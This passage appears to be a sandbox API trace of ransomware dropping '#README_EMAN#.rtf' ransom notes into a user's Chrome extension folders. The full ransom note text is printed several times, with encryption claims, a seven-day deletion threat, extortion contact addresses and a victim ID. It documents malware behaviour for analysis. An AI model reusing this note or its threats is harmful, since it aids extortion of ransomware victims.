\\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0278.936] WriteFile (in: hFile=0x2c8, lpBuffer=0x1f4b618*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4b618*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.937] CloseHandle (hObject=0x2c8) returned 1 [0278.937] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\#readme_eman#.rtf")) returned 0xffffffff [0278.937] GetLastError () returned 0x2 [0278.937] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.943] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.943] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.943] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4b618, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED 